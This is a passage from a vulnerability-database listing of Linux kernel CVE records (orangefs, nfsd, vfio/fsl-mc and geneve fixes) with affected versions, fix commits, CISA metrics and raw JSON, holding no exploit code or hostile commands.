Unaffected: 6.6.27 , ≤ 6.6.* (semver)
Unaffected: 6.8.6 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-36023",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-06-13T20:24:38.395989Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-13T20:24:47.410Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T03:30:12.320Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/2e2177f94c0e0bc41323d7b6975a5f4820ed347e"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/214a6c4a28c11d67044e6cf3a0ab415050d9f03a"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/b972e8ac3f44f693127a2806031962d100dfc4d1"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/9bf93dcfc453fae192fe5d7874b89699e8f800ac"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "fs/orangefs/super.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "2e2177f94c0e0bc41323d7b6975a5f4820ed347e",
              "status": "affected",
              "version": "f7ab093f74bf638ed98fd1115f3efa17e308bb7f",
              "versionType": "git"
            },
            {
              "lessThan": "214a6c4a28c11d67044e6cf3a0ab415050d9f03a",
              "status": "affected",
              "version": "f7ab093f74bf638ed98fd1115f3efa17e308bb7f",
              "versionType": "git"
            },
            {
              "lessThan": "b972e8ac3f44f693127a2806031962d100dfc4d1",
              "status": "affected",
              "version": "f7ab093f74bf638ed98fd1115f3efa17e308bb7f",
              "versionType": "git"
            },
            {
              "lessThan": "9bf93dcfc453fae192fe5d7874b89699e8f800ac",
              "status": "affected",
              "version": "f7ab093f74bf638ed98fd1115f3efa17e308bb7f",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "fs/orangefs/super.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.6"
            },
            {
              "lessThan": "4.6",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.86",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.27",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.6",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.86",
                  "versionStartIncluding": "4.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.27",
                  "versionStartIncluding": "4.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.6",
                  "versionStartIncluding": "4.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "4.6",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nJulia Lawall reported this null pointer dereference, this should fix it."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:10:47.016Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/2e2177f94c0e0bc41323d7b6975a5f4820ed347e"
        },
        {
          "url": "https://git.kernel.org/stable/c/214a6c4a28c11d67044e6cf3a0ab415050d9f03a"
        },
        {
          "url": "https://git.kernel.org/stable/c/b972e8ac3f44f693127a2806031962d100dfc4d1"
        },
        {
          "url": "https://git.kernel.org/stable/c/9bf93dcfc453fae192fe5d7874b89699e8f800ac"
        }
      ],
      "title": "Julia Lawall reported this null pointer dereference, this should fix it.",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-36023",
    "datePublished": "2024-05-30T15:04:00.404Z",
    "dateReserved": "2024-05-17T13:50:33.158Z",
    "dateUpdated": "2025-05-04T09:10:47.016Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-35914 (GCVE-0-2024-35914)

Vulnerability from cvelistv5 – Published: 2024-05-19 08:35 – Updated: 2025-05-04 09:08

Title

nfsd: Fix error cleanup path in nfsd_rename()

Summary

In the Linux kernel, the following vulnerability has been resolved: nfsd: Fix error cleanup path in nfsd_rename() Commit a8b0026847b8 ("rename(): avoid a deadlock in the case of parents having no common ancestor") added an error bail out path. However this path does not drop the remount protection that has been acquired. Fix the cleanup path to properly drop the remount protection.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/331e125e02c08ffae…
	https://git.kernel.org/stable/c/9fe6e9e7b58944037…

Impacted products

Vendor

Product

Version

Linux

Affected: a8b0026847b8c43445c921ad2c85521c92eb175f , < 331e125e02c08ffaecc1074af78a988a278039bd (git)
Affected: a8b0026847b8c43445c921ad2c85521c92eb175f , < 9fe6e9e7b58944037714442384075c17cfde1c56 (git)

Linux

Affected: 6.8
Unaffected: 0 , < 6.8 (semver)
Unaffected: 6.8.5 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-35914",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-06-18T16:53:51.345113Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-18T16:54:02.746Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T03:21:48.929Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/331e125e02c08ffaecc1074af78a988a278039bd"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/9fe6e9e7b58944037714442384075c17cfde1c56"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "fs/nfsd/vfs.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "331e125e02c08ffaecc1074af78a988a278039bd",
              "status": "affected",
              "version": "a8b0026847b8c43445c921ad2c85521c92eb175f",
              "versionType": "git"
            },
            {
              "lessThan": "9fe6e9e7b58944037714442384075c17cfde1c56",
              "status": "affected",
              "version": "a8b0026847b8c43445c921ad2c85521c92eb175f",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "fs/nfsd/vfs.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "6.8"
            },
            {
              "lessThan": "6.8",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.5",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.5",
                  "versionStartIncluding": "6.8",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "6.8",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnfsd: Fix error cleanup path in nfsd_rename()\n\nCommit a8b0026847b8 (\"rename(): avoid a deadlock in the case of parents\nhaving no common ancestor\") added an error bail out path. However this\npath does not drop the remount protection that has been acquired. Fix\nthe cleanup path to properly drop the remount protection."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:08:16.724Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/331e125e02c08ffaecc1074af78a988a278039bd"
        },
        {
          "url": "https://git.kernel.org/stable/c/9fe6e9e7b58944037714442384075c17cfde1c56"
        }
      ],
      "title": "nfsd: Fix error cleanup path in nfsd_rename()",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-35914",
    "datePublished": "2024-05-19T08:35:07.367Z",
    "dateReserved": "2024-05-17T13:50:33.122Z",
    "dateUpdated": "2025-05-04T09:08:16.724Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-26814 (GCVE-0-2024-26814)

Vulnerability from cvelistv5 – Published: 2024-04-05 08:24 – Updated: 2025-05-04 08:57

Title

vfio/fsl-mc: Block calling interrupt handler without trigger

Summary

In the Linux kernel, the following vulnerability has been resolved: vfio/fsl-mc: Block calling interrupt handler without trigger The eventfd_ctx trigger pointer of the vfio_fsl_mc_irq object is initially NULL and may become NULL if the user sets the trigger eventfd to -1. The interrupt handler itself is guaranteed that trigger is always valid between request_irq() and free_irq(), but the loopback testing mechanisms to invoke the handler function need to test the trigger. The triggering and setting ioctl paths both make use of igate and are therefore mutually exclusive. The vfio-fsl-mc driver does not make use of irqfds, nor does it support any sort of masking operations, therefore unlike vfio-pci and vfio-platform, the flow can remain essentially unchanged.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/a563fc18583ca4f42…
	https://git.kernel.org/stable/c/250219c6a556f8c69…
	https://git.kernel.org/stable/c/083e750c9f5f4c3bf…
	https://git.kernel.org/stable/c/ee0bd4ad780dfbb60…
	https://git.kernel.org/stable/c/de87511fb0404d23b…
	https://git.kernel.org/stable/c/6ec0d88166dac43f2…
	https://git.kernel.org/stable/c/7447d911af699a15f…

Impacted products

Vendor

Product

Version

Linux

Affected: cc0ee20bd96971c10eba9a83ecf1c0733078a083 , < a563fc18583ca4f42e2fdd0c70c7c618288e7ede (git)
Affected: cc0ee20bd96971c10eba9a83ecf1c0733078a083 , < 250219c6a556f8c69c5910fca05a59037e24147d (git)
Affected: cc0ee20bd96971c10eba9a83ecf1c0733078a083 , < 083e750c9f5f4c3bf61161330fb84d7c8e8bb417 (git)
Affected: cc0ee20bd96971c10eba9a83ecf1c0733078a083 , < ee0bd4ad780dfbb60355b99f25063357ab488267 (git)
Affected: cc0ee20bd96971c10eba9a83ecf1c0733078a083 , < de87511fb0404d23b6da5f4660383b6ed095e28d (git)
Affected: cc0ee20bd96971c10eba9a83ecf1c0733078a083 , < 6ec0d88166dac43f29e96801c0927d514f17add9 (git)
Affected: cc0ee20bd96971c10eba9a83ecf1c0733078a083 , < 7447d911af699a15f8d050dfcb7c680a86f87012 (git)

Linux

Affected: 5.10
Unaffected: 0 , < 5.10 (semver)
Unaffected: 5.10.215 , ≤ 5.10.* (semver)
Unaffected: 5.15.154 , ≤ 5.15.* (semver)
Unaffected: 6.1.84 , ≤ 6.1.* (semver)
Unaffected: 6.6.24 , ≤ 6.6.* (semver)
Unaffected: 6.7.12 , ≤ 6.7.* (semver)
Unaffected: 6.8.3 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T00:14:13.574Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/a563fc18583ca4f42e2fdd0c70c7c618288e7ede"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/250219c6a556f8c69c5910fca05a59037e24147d"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/083e750c9f5f4c3bf61161330fb84d7c8e8bb417"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/ee0bd4ad780dfbb60355b99f25063357ab488267"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/de87511fb0404d23b6da5f4660383b6ed095e28d"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/6ec0d88166dac43f29e96801c0927d514f17add9"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/7447d911af699a15f8d050dfcb7c680a86f87012"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-26814",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T15:50:33.742029Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:33:43.653Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/vfio/fsl-mc/vfio_fsl_mc_intr.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "a563fc18583ca4f42e2fdd0c70c7c618288e7ede",
              "status": "affected",
              "version": "cc0ee20bd96971c10eba9a83ecf1c0733078a083",
              "versionType": "git"
            },
            {
              "lessThan": "250219c6a556f8c69c5910fca05a59037e24147d",
              "status": "affected",
              "version": "cc0ee20bd96971c10eba9a83ecf1c0733078a083",
              "versionType": "git"
            },
            {
              "lessThan": "083e750c9f5f4c3bf61161330fb84d7c8e8bb417",
              "status": "affected",
              "version": "cc0ee20bd96971c10eba9a83ecf1c0733078a083",
              "versionType": "git"
            },
            {
              "lessThan": "ee0bd4ad780dfbb60355b99f25063357ab488267",
              "status": "affected",
              "version": "cc0ee20bd96971c10eba9a83ecf1c0733078a083",
              "versionType": "git"
            },
            {
              "lessThan": "de87511fb0404d23b6da5f4660383b6ed095e28d",
              "status": "affected",
              "version": "cc0ee20bd96971c10eba9a83ecf1c0733078a083",
              "versionType": "git"
            },
            {
              "lessThan": "6ec0d88166dac43f29e96801c0927d514f17add9",
              "status": "affected",
              "version": "cc0ee20bd96971c10eba9a83ecf1c0733078a083",
              "versionType": "git"
            },
            {
              "lessThan": "7447d911af699a15f8d050dfcb7c680a86f87012",
              "status": "affected",
              "version": "cc0ee20bd96971c10eba9a83ecf1c0733078a083",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/vfio/fsl-mc/vfio_fsl_mc_intr.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.10"
            },
            {
              "lessThan": "5.10",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.215",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.154",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.84",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.24",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.7.*",
              "status": "unaffected",
              "version": "6.7.12",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.3",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.215",
                  "versionStartIncluding": "5.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.154",
                  "versionStartIncluding": "5.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.84",
                  "versionStartIncluding": "5.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.24",
                  "versionStartIncluding": "5.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.7.12",
                  "versionStartIncluding": "5.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.3",
                  "versionStartIncluding": "5.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "5.10",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nvfio/fsl-mc: Block calling interrupt handler without trigger\n\nThe eventfd_ctx trigger pointer of the vfio_fsl_mc_irq object is\ninitially NULL and may become NULL if the user sets the trigger\neventfd to -1.  The interrupt handler itself is guaranteed that\ntrigger is always valid between request_irq() and free_irq(), but\nthe loopback testing mechanisms to invoke the handler function\nneed to test the trigger.  The triggering and setting ioctl paths\nboth make use of igate and are therefore mutually exclusive.\n\nThe vfio-fsl-mc driver does not make use of irqfds, nor does it\nsupport any sort of masking operations, therefore unlike vfio-pci\nand vfio-platform, the flow can remain essentially unchanged."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T08:57:10.359Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/a563fc18583ca4f42e2fdd0c70c7c618288e7ede"
        },
        {
          "url": "https://git.kernel.org/stable/c/250219c6a556f8c69c5910fca05a59037e24147d"
        },
        {
          "url": "https://git.kernel.org/stable/c/083e750c9f5f4c3bf61161330fb84d7c8e8bb417"
        },
        {
          "url": "https://git.kernel.org/stable/c/ee0bd4ad780dfbb60355b99f25063357ab488267"
        },
        {
          "url": "https://git.kernel.org/stable/c/de87511fb0404d23b6da5f4660383b6ed095e28d"
        },
        {
          "url": "https://git.kernel.org/stable/c/6ec0d88166dac43f29e96801c0927d514f17add9"
        },
        {
          "url": "https://git.kernel.org/stable/c/7447d911af699a15f8d050dfcb7c680a86f87012"
        }
      ],
      "title": "vfio/fsl-mc: Block calling interrupt handler without trigger",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-26814",
    "datePublished": "2024-04-05T08:24:43.916Z",
    "dateReserved": "2024-02-19T14:20:24.180Z",
    "dateUpdated": "2025-05-04T08:57:10.359Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-26857 (GCVE-0-2024-26857)

Vulnerability from cvelistv5 – Published: 2024-04-17 10:17 – Updated: 2025-05-04 08:58

Title

geneve: make sure to pull inner header in geneve_rx()

Summary

In the Linux kernel, the following vulnerability has been resolved: geneve: make sure to pull inner header in geneve_rx() syzbot triggered a bug in geneve_rx() [1] Issue is similar to the one I fixed in commit 8d975c15c0cd ("ip6_tunnel: make sure to pull inner header in __ip6_tnl_rcv()") We have to save skb->network_header in a temporary variable in order to be able to recompute the network_header pointer after a pskb_inet_may_pull() call. pskb_inet_may_pull() makes sure the needed headers are in skb->head. [1] BUG: KMSAN: uninit-value in IP_ECN_decapsulate include/net/inet_ecn.h:302 [inline] BUG: KMSAN: uninit-value in geneve_rx drivers/net/geneve.c:279 [inline] BUG: KMSAN: uninit-value in geneve_udp_encap_recv+0x36f9/0x3c10 drivers/net/geneve.c:391 IP_ECN_decapsulate include/net/inet_ecn.h:302 [inline] geneve_rx drivers/net/geneve.c:279 [inline] geneve_udp_encap_recv+0x36f9/0x3c10 drivers/net/geneve.c:391 udp_queue_rcv_one_skb+0x1d39/0x1f20 net/ipv4/udp.c:2108 udp_queue_rcv_skb+0x6ae/0x6e0 net/ipv4/udp.c:2186 udp_unicast_rcv_skb+0x184/0x4b0 net/ipv4/udp.c:2346 __udp4_lib_rcv+0x1c6b/0x3010 net/ipv4/udp.c:2422 udp_rcv+0x7d/0xa0 net/ipv4/udp.c:2604 ip_protocol_deliver_rcu+0x264/0x1300 net/ipv4/ip_input.c:205 ip_local_deliver_finish+0x2b8/0x440 net/ipv4/ip_input.c:233 NF_HOOK include/linux/netfilter.h:314 [inline] ip_local_deliver+0x21f/0x490 net/ipv4/ip_input.c:254 dst_input include/net/dst.h:461 [inline] ip_rcv_finish net/ipv4/ip_input.c:449 [inline] NF_HOOK include/linux/netfilter.h:314 [inline] ip_rcv+0x46f/0x760 net/ipv4/ip_input.c:569 __netif_receive_skb_one_core net/core/dev.c:5534 [inline] __netif_receive_skb+0x1a6/0x5a0 net/core/dev.c:5648 process_backlog+0x480/0x8b0 net/core/dev.c:5976 __napi_poll+0xe3/0x980 net/core/dev.c:6576 napi_poll net/core/dev.c:6645 [inline] net_rx_action+0x8b8/0x1870 net/core/dev.c:6778 __do_softirq+0x1b7/0x7c5 kernel/softirq.c:553 do_softirq+0x9a/0xf0 kernel/softirq.c:454 __local_bh_enable_ip+0x9b/0xa0 kernel/softirq.c:381 local_bh_enable include/linux/bottom_half.h:33 [inline] rcu_read_unlock_bh include/linux/rcupdate.h:820 [inline] __dev_queue_xmit+0x2768/0x51c0 net/core/dev.c:4378 dev_queue_xmit include/linux/netdevice.h:3171 [inline] packet_xmit+0x9c/0x6b0 net/packet/af_packet.c:276 packet_snd net/packet/af_packet.c:3081 [inline] packet_sendmsg+0x8aef/0x9f10 net/packet/af_packet.c:3113 sock_sendmsg_nosec net/socket.c:730 [inline] __sock_sendmsg net/socket.c:745 [inline] __sys_sendto+0x735/0xa10 net/socket.c:2191 __do_sys_sendto net/socket.c:2203 [inline] __se_sys_sendto net/socket.c:2199 [inline] __x64_sys_sendto+0x125/0x1c0 net/socket.c:2199 do_syscall_x64 arch/x86/entry/common.c:52 [inline] do_syscall_64+0xcf/0x1e0 arch/x86/entry/common.c:83 entry_SYSCALL_64_after_hwframe+0x63/0x6b Uninit was created at: slab_post_alloc_hook mm/slub.c:3819 [inline] slab_alloc_node mm/slub.c:3860 [inline] kmem_cache_alloc_node+0x5cb/0xbc0 mm/slub.c:3903 kmalloc_reserve+0x13d/0x4a0 net/core/skbuff.c:560 __alloc_skb+0x352/0x790 net/core/skbuff.c:651 alloc_skb include/linux/skbuff.h:1296 [inline] alloc_skb_with_frags+0xc8/0xbd0 net/core/skbuff.c:6394 sock_alloc_send_pskb+0xa80/0xbf0 net/core/sock.c:2783 packet_alloc_skb net/packet/af_packet.c:2930 [inline] packet_snd net/packet/af_packet.c:3024 [inline] packet_sendmsg+0x70c2/0x9f10 net/packet/af_packet.c:3113 sock_sendmsg_nosec net/socket.c:730 [inline] __sock_sendmsg net/socket.c:745 [inline] __sys_sendto+0x735/0xa10 net/socket.c:2191 __do_sys_sendto net/socket.c:2203 [inline] __se_sys_sendto net/socket.c:2199 [inline] __x64_sys_sendto+0x125/0x1c0 net/socket.c:2199 do_syscall_x64 arch/x86/entry/common.c:52 [inline] do_syscall_64+0xcf/0x1e0 arch/x86/entry/common.c:83 entry_SYSCALL_64_after_hwframe+0x63/0x6b

Severity ?

5.5 (Medium)


                        
                          CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CWE

CWE-noinfo Not enough information

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/e431c3227864b5646…
	https://git.kernel.org/stable/c/59d2a4076983303f3…
	https://git.kernel.org/stable/c/c7137900691f5692f…
	https://git.kernel.org/stable/c/e77e0b0f2a11735c6…
	https://git.kernel.org/stable/c/c0b22568a9d8384fd…
	https://git.kernel.org/stable/c/0ece581d2a66e8e48…
	https://git.kernel.org/stable/c/048e16dee1fc609c1…
	https://git.kernel.org/stable/c/1ca1ba465e55b9460…

Impacted products

Vendor

Product

Version

Linux

Affected: 2d07dc79fe04a43d82a346ced6bbf07bdb523f1b , < e431c3227864b5646601c97f5f898d99472f2914 (git)
Affected: 2d07dc79fe04a43d82a346ced6bbf07bdb523f1b , < 59d2a4076983303f324557a114cfd5c32e1f6b29 (git)
Affected: 2d07dc79fe04a43d82a346ced6bbf07bdb523f1b , < c7137900691f5692fe3de54566ea7b30bb35d66c (git)
Affected: 2d07dc79fe04a43d82a346ced6bbf07bdb523f1b , < e77e0b0f2a11735c64b105edaee54d6344faca8a (git)
Affected: 2d07dc79fe04a43d82a346ced6bbf07bdb523f1b , < c0b22568a9d8384fd000cc49acb8f74bde40d1b5 (git)
Affected: 2d07dc79fe04a43d82a346ced6bbf07bdb523f1b , < 0ece581d2a66e8e488c0d3b3e7b5760dbbfdbdd5 (git)
Affected: 2d07dc79fe04a43d82a346ced6bbf07bdb523f1b , < 048e16dee1fc609c1c85072ccd70bfd4b5fef6ca (git)
Affected: 2d07dc79fe04a43d82a346ced6bbf07bdb523f1b , < 1ca1ba465e55b9460e4e75dec9fff31e708fec74 (git)

Linux

Affected: 4.2
Unaffected: 0 , < 4.2 (semver)
Unaffected: 4.19.310 , ≤ 4.19.* (semver)
Unaffected: 5.4.272 , ≤ 5.4.* (semver)
Unaffected: 5.10.213 , ≤ 5.10.* (semver)
Unaffected: 5.15.152 , ≤ 5.15.* (semver)
Unaffected: 6.1.82 , ≤ 6.1.* (semver)
Unaffected: 6.6.22 , ≤ 6.6.* (semver)
Unaffected: 6.7.10 , ≤ 6.7.* (semver)
Unaffected: 6.8 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "cvssV3_1": {
              "attackComplexity": "LOW",
              "attackVector": "LOCAL",
              "availabilityImpact": "HIGH",
              "baseScore": 5.5,
              "baseSeverity": "MEDIUM",
